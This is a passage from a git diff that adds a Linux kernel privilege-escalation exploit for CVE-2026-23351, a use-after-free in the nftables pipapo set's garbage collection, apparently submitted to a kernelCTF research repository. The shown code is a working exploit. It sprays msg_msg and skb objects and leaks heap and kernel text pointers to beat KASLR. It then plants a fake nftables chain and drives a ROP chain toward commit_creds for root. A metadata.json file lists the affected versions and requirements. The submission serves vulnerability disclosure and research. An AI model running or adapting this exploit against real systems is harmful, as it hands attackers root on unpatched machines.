NUM_SPRAY_QUEUES, NUM_RECLAIM_QUEUES); + + /* Add target element (::1,::1) with 2s timeout */ + if (add_target(fd, buf)) die("target failed (cycle %d)", cycle); + num_commits++; + + /* CPU layout: commit + spray1 on CPU 0, flood + GP forcer on CPU 1. + * Spray phase 1 fills main queues (saturates SLUB cache, all pages FULL). + * Spray phase 2 idles until the commit starts. + * Spray phase 3 fills reclaim queues (pure alloc, no drain/free). + * When kfree fires, target page is ONLY partial on CPU 0. + * Phase 3 allocs exhaust c->slab leftovers, then pick freed page. 
*/ + struct spray1_ctx sctx1 = { + .qids = spray_qids, + .n_queues = NUM_SPRAY_QUEUES, + .reclaim_qids = reclaim_qids, + .n_reclaim = NUM_RECLAIM_QUEUES + }; + pthread_t spray1_tid; + { + pthread_attr_t attr; + pthread_attr_init(&attr); + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(0, &cpuset); /* Must be CPU 0: target page frozen on CPU 0's partial list */ + pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset); + pthread_create(&spray1_tid, &attr, spray1_fn, &sctx1); + pthread_attr_destroy(&attr); + } + + struct gp_ctx gpctx = {}; + pthread_t gp_tid; + { + pthread_attr_t attr; + pthread_attr_init(&attr); + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(1, &cpuset); /* GP forcer on CPU 1 — separate from commit (CPU 0) */ + pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset); + pthread_create(&gp_tid, &attr, gp_forcer_fn, &gpctx); + pthread_attr_destroy(&attr); + } + + /* Start GP forcer and spray EARLY. Spray fills during the 3s wait, + * saturating CPU 0's SLUB cache. When commit's kfree fires, the + * freed page is the ONLY partial → next allocation reclaims it. + * Spray phase 3 (pure allocation into the reclaim queues) keeps + * allocating during vmalloc. */ + gpctx.go = 1; + sctx1.go = 1; /* Start spray NOW — fills during sleep */ + + /* Passive wait for target to expire (2s timeout + 1s margin). + * During this time, spray1 fills the main queues (phase 1) and then + * parks in phase 2 until the commit starts. */ + sleep(3); + + /* Print flood stats from the wait phase (before reset) */ + printf("[*] Wait-phase flood: sent=%ld recv=%ld miss=%ld hit=%ld changed=%ld\n", + fctx.sent, fctx.recv_ok, fctx.miss, fctx.hit, fctx.changed); + if (fctx.changed > 0) { + printf("[!!!] 
UAF data seen during wait phase!\n"); + for (int i = 0; i < fctx.n_unique_vals; i++) { + uint64_t v = fctx.changed_vals[i]; + uint8_t *vb = (uint8_t *)&v; + printf(" wait_val[%d] = 0x%016lx [%02x %02x %02x %02x %02x %02x %02x %02x]\n", + i, (unsigned long)v, + vb[0], vb[1], vb[2], vb[3], vb[4], vb[5], vb[6], vb[7]); + } + } + + /* Reset flood counters */ + fctx.sent = fctx.recv_ok = fctx.miss = fctx.hit = fctx.changed = 0; + fctx.n_unique_vals = 0; + fctx.n_raw = 0; + memset((void *)fctx.bucket_miss, 0, sizeof(fctx.bucket_miss)); + memset((void *)fctx.bucket_hit, 0, sizeof(fctx.bucket_hit)); + memset((void *)fctx.bucket_changed, 0, sizeof(fctx.bucket_changed)); + + /* Commit thread on CPU 0 — runs nft_commit (pipapo_gc + pipapo_clone). + * pipapo_gc calls call_rcu(kfree) on CPU 0. + * kfree fires on CPU 0 (softirq) → full page becomes partial → + * put_cpu_partial adds to CPU 0's partial list. + * spray1 also on CPU 0 → allocates from CPU 0's partial → reclaims. + * During vmalloc (~10ms), cond_resched switches between commit and spray1. + * GP forcer on CPU 1 forces GP completion via membarrier. */ + struct commit_ctx cctx = {}; + cctx.fd = fd; + cctx.idx = dummy_idx++; + pthread_t commit_tid; + { + pthread_attr_t attr; + pthread_attr_init(&attr); + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(0, &cpuset); /* Same CPU as spray1 — SLUB reclaim requires same CPU */ + pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset); + pthread_create(&commit_tid, &attr, commit_fn, &cctx); + pthread_attr_destroy(&attr); + } + + uint64_t t0 = now_us(); + fctx.t_base = t0; + fctx.record_after_us = 0; + fctx.recording = 1; + /* spray1 finished phase 1 (SLUB saturated), waiting in phase 2. + * Start both commit and spray phase 3 simultaneously. */ + long spray_pre = sctx1.count; /* Phase 1 total */ + sctx1.go_phase2 = 1; + cctx.go = 1; + + /* Main thread on CPU 0: yield to commit+spray threads. + * GP forcer on CPU 1 handles GP completion. 
+ * Main thread just waits — don't waste CPU 0 time. */ + int gp_calls = 0; + while (!cctx.done) { + usleep(500); /* Yield CPU 0 to commit+spray */ + gp_calls++; + } + + /* Wait for commit to finish */ + pthread_join(commit_tid, NULL); + uint64_t commit_us = cctx.t_done - t0; + rc = cctx.result; + fctx.recording = 0; + sctx1.stop = 1; + gpctx.stop = 1; + pthread_join(spray1_tid, NULL); + pthread_join(gp_tid, NULL); + num_commits++; + + long spray_delta = sctx1.count - spray_pre; + printf("[*] Commit: %s %.1fms, spray1=%ld(+%ld ph%d), gp_mbr=%d, changed=%ld, miss=%ld, hit=%ld\n", + rc ? "FAIL" : "OK", commit_us / 1000.0, + sctx1.count, spray_delta, sctx1.phase, gpctx.count, fctx.changed, fctx.miss, fctx.hit); + /* Time buckets (always print to see UAF window coverage) */ + printf(" time buckets:\n"); + for (int b = 0; b < 10; b++) { + long m = fctx.bucket_miss[b], h = fctx.bucket_hit[b], c = fctx.bucket_changed[b]; + printf(" %2d-%2dms: miss=%ld hit=%ld changed=%ld\n", + b*2, (b+1)*2, m, h, c); + } + + if (fctx.changed == 0) { + /* Debug: print first 20 raw recv values during commit window */ + printf(" DEBUG raw values (n_raw=%d):\n", fctx.n_raw); + for (int i = 0; i < fctx.n_raw && i < 20; i++) { + printf(" [%d] t=%ldus val=0x%016lx\n", + i, (long)fctx.raw_ts[i], (unsigned long)fctx.raw_vals[i]); + } + printf(" No UAF this cycle\n"); + } else { + + /* Analyze returned values. + * After msg_msg reclaim in kmalloc-cg-512: + * ext->offset[DATA] = byte 3 of m_list.next pointer. + * offset[DATA] < 8: reads from m_list.next → kernel heap pointer! + * offset[DATA] 8-15: reads from m_list.prev → kernel heap pointer! + * offset[DATA] 16-23: reads from m_type (=0x42) + * offset[DATA] 24-31: reads from m_ts (=SPRAY_MSG_DSIZE=464) + * offset[DATA] 32-39: reads from next (=NULL) + * offset[DATA] 40-47: reads from security (LSM ptr, if non-NULL) + * offset[DATA] 48-511: reads from mtext (our marker pattern 0x41+i) + * All reads stay within the same 512B object. 
*/ + printf(" changed=%ld (zero_vals=%ld, unique=%d)\n", + fctx.changed, fctx.changed - (fctx.n_unique_vals > 0 ? 0 : fctx.changed), + fctx.n_unique_vals); + for (int i = 0; i < fctx.n_unique_vals; i++) { + uint64_t v = fctx.changed_vals[i]; + uint8_t *vb = (uint8_t *)&v; + printf(" val[%d] = 0x%016lx bytes=[%02x %02x %02x %02x %02x %02x %02x %02x]", + i, (unsigned long)v, + vb[0], vb[1], vb[2], vb[3], vb[4], vb[5], vb[6], vb[7]); + + /* Check if this looks like our mtext marker pattern. + * mtext[j] = 0x41 + j. If we read from ext+offset[DATA], + * and offset[DATA] ∈ [48,127], then read_off = offset[DATA] + * and mtext_off = read_off - 48, first byte = 0x41 + mtext_off. */ + /* Check if sequential mtext pattern (mtext[j]=0x41+j, wraps at 256). + * With 208-byte mtext, pattern covers nearly all byte values. */ + { + int is_marker = 1; + for (int j = 1; j < 8; j++) { + if (vb[j] != (uint8_t)(vb[0] + j)) { is_marker = 0; break; } + } + if (is_marker) { + int mtext_off = (uint8_t)(vb[0] - 0x41); + int read_off = mtext_off + 48; /* offset from ext/msg_msg start (hdr=48) */ + printf(" ← MTEXT (off=%d, offset[DATA]=0x%02x)", + mtext_off, read_off); + printf("\n"); + continue; + } + } + + /* Try all 8 rotations to find a valid kernel pointer. + * Classify as HEAP (direct-map 0xFFFF8xxx-0xFFFFeaxx) or + * TEXT (kernel text 0xFFFFFFFF8xxxx-0xFFFFFFFFBxxxx). + * TEXT ptrs come from uninitialized REG_3 stack residue when + * element appears expired (offset[EXPIRATION]=0xFF after msg_msg + * reclaim) — the register isn't written, payload writes stack garbage. 
*/ + int found_ptr = 0; + for (int rot = 0; rot < 8; rot++) { + uint8_t P[8]; + for (int j = 0; j < 8; j++) + P[j] = vb[(rot + j) % 8]; + if (P[7] == 0xFF && P[6] == 0xFF && (P[5] & 0xF0) >= 0x80) { + uint64_t ptr; + memcpy(&ptr, P, 8); + /* Filter false positives: reject if low bytes look like + * known msg_msg fields (m_type=0x42, m_ts=0x50) */ + if (rot != 0 && (P[0] == 0x42 || P[0] == 0x50) && + P[1] == 0x00 && P[2] == 0x00 && P[3] == 0x00) { + printf(" ← FALSE_PTR (rot=%d, msg_msg field): 0x%016lx", + rot, (unsigned long)ptr); + } else { + /* Classify: TEXT ptr has bytes 4-7 all = 0xFF + * and byte 3 >= 0x80 (kernel text range). + * HEAP ptr has bytes 6-7 = 0xFF but bytes 4-5 variable. */ + int is_text = (P[4] == 0xFF && P[5] == 0xFF && + P[6] == 0xFF && P[7] == 0xFF && + (P[3] & 0x80)); + if (is_text) { + printf(" ← TEXT PTR (rot=%d): 0x%016lx", rot, (unsigned long)ptr); + if (!text_leak) + text_leak = ptr; + } else { + /* Validate: kmalloc-cg-512 objects are 512-byte aligned */ + if ((ptr & 0x1FF) != 0) { + printf(" ← HEAP PTR (rot=%d, UNALIGNED): 0x%016lx", rot, (unsigned long)ptr); + } else { + printf(" ← HEAP PTR (rot=%d): 0x%016lx", rot, (unsigned long)ptr); + if (!heap_leak) + heap_leak = ptr; + } + } + found_ptr = 1; + } + break; + } + } + if (!found_ptr) { + /* Check for partial kernel pointer: scan for 0xFF 0xFF sequence. + * ff_pos is -1 when nothing is found, because 0 is a valid position. */ + int ff_pos = -1; + for (int j = 0; j < 7; j++) { + if (vb[j] == 0xFF && vb[j+1] == 0xFF) { ff_pos = j; break; } + } + if (ff_pos >= 0) { + printf(" ← PARTIAL_PTR (ff_ff at byte %d)", ff_pos); + } else { + printf(" ← UNKNOWN (not marker, not ptr)"); + } + } + printf("\n"); + } + + if (heap_leak) { + printf("\n[+] HEAP LEAK at cycle %d: 0x%016lx\n", + cycle, (unsigned long)heap_leak); + printf("[+] page_offset_base: 0x%016lx\n", + (unsigned long)(heap_leak & ~0xFFFFFFFFULL)); + /* text_base already known from side-channel */ + printf("[+] text_base (side-channel): 0x%016lx\n", (unsigned long)text_base); + break; + } + if (text_leak) { + 
/* Also accept text pointer from UAF if we get one */ + if (!text_base) + text_base = text_leak & ~0xFFFFFFULL; + } + + printf(" UAF confirmed but no kernel pointer this cycle\n"); + + /* KASLR alignment check: offset[DATA] = byte 3 of m_list.next, + * which includes KASLR page_offset_base shift at 1GB granularity. + * Base byte 3 cycles: 0x00(N=0), 0x40(N=1), 0x80(N=2), 0xC0(N=3). + * Only N=0 gives offset[DATA] < ~0x30, hitting msg_msg header + * where kernel pointers reside. N=1,2,3 always read mtext. + * KASLR is fixed per boot, so if the first cycle (cycle 0) shows only + * mtext, every later cycle will too. + * Exit early to let wrapper script reboot and retry (25% per boot). */ + if (cycle == 0 && fctx.n_unique_vals > 0) { + int all_mtext = 1; + for (int i = 0; i < fctx.n_unique_vals; i++) { + uint64_t v = fctx.changed_vals[i]; + uint8_t *vb = (uint8_t *)&v; + int is_marker = 1; + for (int j = 1; j < 8; j++) { + if (vb[j] != (uint8_t)(vb[0] + j)) { is_marker = 0; break; } + } + if (!is_marker) { all_mtext = 0; break; } + } + if (all_mtext) { + uint8_t off_data = (uint8_t)((fctx.changed_vals[0]) - 0x41 + 48); + uint8_t kaslr_n = (off_data & 0xC0) >> 6; + printf("\n[!] KASLR alignment unfavorable: offset[DATA]=0x%02x " + "(N=%d mod 4, base=0x%02x). Need N=0.\n", + off_data, kaslr_n, kaslr_n * 0x40); + printf("[!] Exiting (code 2). Reboot VM and retry (~25%% chance per boot).\n"); + fctx.stop = 1; + pthread_join(ftid, NULL); + free(buf); close(fd); + return 2; + } + } + } /* end else (changed > 0) */ + + /* @step(name="vuln_trigger_exit") In --vuln-trigger mode, one cycle is enough. + * KASAN will have already reported the UAF during the flood thread's lookups. */ + if (vuln_trigger_only) { + printf("[*] --vuln-trigger: UAF triggered, KASAN should have fired. Exiting.\n"); + fctx.stop = 1; + pthread_join(ftid, NULL); + return 0; + } + + /* Wait for RCU GP so old match is freed BEFORE we free spray msg_msgs. 
+ * Without this: freeing all msg_msgs → slab page released to buddy → + * old match's element pointer now dangles → crash on next lookup. + * membarrier + sleep ensures call_rcu(pipapo_reclaim_match) has fired. */ + syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); + usleep(100000); /* 100ms for RCU callback processing */ + printf(" Cleaning up %d queues for next cycle\n", NUM_SPRAY_QUEUES); + { + struct { long mtype; char mtext[SPRAY_MSG_DSIZE]; } drain; + for (int i = 0; i < NUM_SPRAY_QUEUES; i++) { + while (msgrcv(spray_qids[i], &drain, SPRAY_MSG_DSIZE, 0, IPC_NOWAIT) >= 0) + ; + msgctl(spray_qids[i], IPC_RMID, NULL); + } + for (int i = 0; i < NUM_RECLAIM_QUEUES; i++) { + while (msgrcv(reclaim_qids[i], &drain, SPRAY_MSG_DSIZE, 0, IPC_NOWAIT) >= 0) + ; + msgctl(reclaim_qids[i], IPC_RMID, NULL); + } + } + } + + if (!heap_leak) { + printf("[-] No heap leak after %d cycles.\n", MAX_CYCLES); + fctx.stop = 1; + pthread_join(ftid, NULL); + free(buf); close(fd); + return 1; + } + + printf("\n=== PHASE 1 COMPLETE: HEAP LEAK ===\n"); + printf("[+] text_base: 0x%016lx\n", (unsigned long)text_base); + printf("[+] heap_leak: 0x%016lx\n", (unsigned long)heap_leak); + printf("[+] commit_creds: 0x%016lx\n", (unsigned long)(text_base + OFF_COMMIT_CREDS)); + printf("[+] init_cred: 0x%016lx\n", (unsigned long)(text_base + OFF_INIT_CRED)); + printf("[+] nft_immediate_eval: 0x%016lx\n", (unsigned long)(text_base + OFF_NFT_IMMEDIATE_EVAL)); + + /* ====== Phase 3 setup: place fake chain at known heap address ====== + * + * Strategy: + * 1. Drain all Phase 1 spray queues → frees msg_msgs (including one at heap_leak) + * 2. Re-spray msg_msgs with fake chain data → one lands at heap_leak + * 3. Now heap_leak + 48 (mtext start) has our fake chain/blob/rule/expression + * 4. 
Trigger verdict map UAF → reclaim with skb → verdict GOTO → fake chain → ROP + */ + + printf("\n=== PHASE 3: CODE EXECUTION ===\n"); + + /* Wait for RCU GP to ensure old pipapo match is freed */ + syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1); + usleep(100000); + + /* Place fake chain at heap_leak address. + * Per-queue batch: drain entire queue, then refill with fake chain data. + * SLUB per-cpu freelist is LIFO within a batch, so refill reuses freed slots. */ + uint64_t chain_addr = heap_leak + 48; /* mtext[0] in msg_msg at heap_leak */ + + struct { long mtype; char mtext[SPRAY_MSG_DSIZE]; } chain_msg; + chain_msg.mtype = 0x43; + build_fake_chain_mtext((uint8_t *)chain_msg.mtext, heap_leak, text_base); + + struct { long mtype; char mtext[SPRAY_MSG_DSIZE]; } drain_buf; + printf("[*] Per-queue drain+refill on Phase 1 queues...\n"); + int drained = 0, refilled = 0; + for (int i = 0; i < NUM_SPRAY_QUEUES; i++) { + int qcount = 0; + while (msgrcv(spray_qids[i], &drain_buf, SPRAY_MSG_DSIZE, 0, IPC_NOWAIT) >= 0) + qcount++; + drained += qcount; + for (int j = 0; j < qcount; j++) { + if (msgsnd(spray_qids[i], &chain_msg, SPRAY_MSG_DSIZE, IPC_NOWAIT) == 0) + refilled++; + } + } + for (int i = 0; i < NUM_RECLAIM_QUEUES; i++) { + int qcount = 0; + while (msgrcv(reclaim_qids[i], &drain_buf, SPRAY_MSG_DSIZE, 0, IPC_NOWAIT) >= 0) + qcount++; + drained += qcount; + for (int j = 0; j < qcount; j++) { + if (msgsnd(reclaim_qids[i], &chain_msg, SPRAY_MSG_DSIZE, IPC_NOWAIT) == 0) + refilled++; + } + } + printf("[+] Drain+refill: drained=%d refilled=%d\n", drained, refilled); + printf("[+] Fake chain addr: 0x%016lx\n", (unsigned long)chain_addr); + + /* Add verdict map target element (2s timeout). + * This triggers a commit which includes both sets. 
*/ + printf("[*] Adding verdict map target (2s timeout)...\n"); + if (add_target_v(fd, buf)) die("target_v failed"); + num_commits++; + + /* Wait for verdict map target to expire */ + printf("[*] Waiting 3s for verdict map target expiry...\n"); + sleep(3); + + /* Set up skb spray for verdict map UAF reclaim */ + printf("[*] Initializing skb spray...\n"); + if (skb_spray_init() < 0) die("skb spray init failed"); + + /* Build skb payload: the verdict points to the fake chain in the msg_msg at heap_leak */ + uint8_t skb_payload[SKB_SPRAY_PAYLOAD]; + build_skb_payload(skb_payload, SKB_SPRAY_PAYLOAD, chain_addr); + + /* Set up Phase 3 spray + commit threads (same architecture as Phase 1) */ + int spray3_qids[NUM_SPRAY_QUEUES]; + int reclaim3_qids[NUM_RECLAIM_QUEUES]; + for (int i = 0; i < NUM_SPRAY_QUEUES; i++) { + spray3_qids[i] = msgget(IPC_PRIVATE, 0666); + if (spray3_qids[i] < 0) die("msgget spray3: %s", strerror(errno)); + } + for (int i = 0; i < NUM_RECLAIM_QUEUES; i++) { + reclaim3_qids[i] = msgget(IPC_PRIVATE, 0666); + if (reclaim3_qids[i] < 0) die("msgget reclaim3: %s", strerror(errno)); + } + + /* Phase 3 spray thread — uses skb spray instead of msg_msg for reclaim. + * We saturate the SLUB cache with msg_msgs first (phase 1 of spray), + * then use skb for the actual reclaim (closer to the kfree). 
*/ + struct spray1_ctx sctx3 = { + .qids = spray3_qids, + .n_queues = NUM_SPRAY_QUEUES, + .reclaim_qids = reclaim3_qids, + .n_reclaim = NUM_RECLAIM_QUEUES + }; + pthread_t spray3_tid; + { + pthread_attr_t attr; + pthread_attr_init(&attr); + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(0, &cpuset); + pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset); + pthread_create(&spray3_tid, &attr, spray1_fn, &sctx3); + pthread_attr_destroy(&attr); + } + + struct gp_ctx gpctx3 = {}; + pthread_t gp3_tid; + { + pthread_attr_t attr; + pthread_attr_init(&attr); + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(1, &cpuset); + pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset); + pthread_create(&gp3_tid, &attr, gp_forcer_fn, &gpctx3); + pthread_attr_destroy(&attr); + } + + gpctx3.go = 1; + sctx3.go = 1; + sleep(3); /* Let spray saturate SLUB cache */ + + /* Reset flood counters */ + fctx.sent = fctx.recv_ok = fctx.miss = fctx.hit = fctx.changed = 0; + + /* Trigger commit — this runs pipapo_gc on the clone, freeing the expired + * verdict map target. During vmalloc, the skb spray reclaims the slot. */ + /* Phase 3 commit must modify set "v" to trigger pipapo_gc on it. 
*/ + struct commit_ctx cctx3 = {}; + cctx3.fd = fd; + cctx3.idx = dummy_idx++; + cctx3.use_verdict_set = 1; /* Add dummy to "v" so pipapo_gc runs on it */ + pthread_t commit3_tid; + { + pthread_attr_t attr; + pthread_attr_init(&attr); + cpu_set_t cpuset; + CPU_ZERO(&cpuset); + CPU_SET(0, &cpuset); + pthread_attr_setaffinity_np(&attr, sizeof(cpuset), &cpuset); + pthread_create(&commit3_tid, &attr, commit_fn, &cctx3); + pthread_attr_destroy(&attr); + } + + sctx3.go_phase2 = 1; + cctx3.go = 1; + + /* In parallel: spray skbs on CPU 0 during the vmalloc window */ + printf("[*] Spraying skbs for verdict map reclaim...\n"); + int skb_sent = 0; + while (!cctx3.done) { + skb_sent += skb_spray_send(skb_payload, SKB_SPRAY_PAYLOAD); + usleep(100); + } + + pthread_join(commit3_tid, NULL); + (void)(cctx3.t_done); + printf("[*] Phase 3 commit done (rc=%d), skb_sent=%d\n", cctx3.result, skb_sent); + + sctx3.stop = 1; + gpctx3.stop = 1; + pthread_join(spray3_tid, NULL); + pthread_join(gp3_tid, NULL); + num_commits++; + + /* The verdict map element is now reclaimed by either msg_msg or skb. + * If skb reclaimed it: pipapo_lookup returns our controlled verdict → + * NFT_GOTO → fake chain → nft_immediate OOB dreg → ROP → shell. + * + * The flood thread sends packets that trigger the pipapo lookup. + * If everything worked, we already got root via the ROP chain. + * The shell() function was called via iretq return. + * If we're still here, the skb didn't reclaim correctly. */ + printf("[*] Waiting 2s for flood thread to trigger the verdict lookup...\n"); + sleep(2); + + /* If we reach here, the exploit didn't trigger. + * Check flood stats for any changes indicating the UAF happened. 
*/ + printf("[*] Flood stats: sent=%ld recv=%ld miss=%ld hit=%ld changed=%ld\n", + fctx.sent, fctx.recv_ok, fctx.miss, fctx.hit, fctx.changed); + + /* Clean up */ + fctx.stop = 1; + pthread_join(ftid, NULL); + skb_spray_free(); + + for (int i = 0; i < NUM_SPRAY_QUEUES; i++) + msgctl(spray3_qids[i], IPC_RMID, NULL); + for (int i = 0; i < NUM_RECLAIM_QUEUES; i++) + msgctl(reclaim3_qids[i], IPC_RMID, NULL); + + printf("[-] Phase 3 did not trigger. Exploit failed.\n"); + free(buf); + close(fd); + return 1; +} diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/target_db.kxdb b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/target_db.kxdb new file mode 100644 index 000000000..b47d2547a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23351_cos/exploit/cos-121-18867.381.30/target_db.kxdb differ diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/metadata.json b/pocs/linux/kernelctf/CVE-2026-23351_cos/metadata.json new file mode 100644 index 000000000..e4fb70abb --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23351_cos/metadata.json @@ -0,0 +1,22 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp475"], + "vulnerability": { + "summary": "UAF in nft_set_pipapo GC: pipapo_gc frees elements via kfree_rcu while pipapo_clone forces vmalloc, whose cond_resched completes the RCU grace period before rcu_assign_pointer swaps the match", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9df95785d3d8302f7c066050117b04cd3c2048c2", + "cve": "CVE-2026-23351", + "affected_versions": ["5.6 - 6.14"], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": ["CONFIG_NF_TABLES"] + } + }, + "exploits": { + "cos-121-18867.381.30": { + "uses": ["userns"], + "requires_separate_kaslr_leak": true, + "stability_notes": "~25% per boot (page_offset_base alignment), 
reliable within 4-8 reboots" + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2026-23351_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2026-23351_cos/original.tar.gz new file mode 100644 index 000000000..1de40ae22 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23351_cos/original.tar.gz differ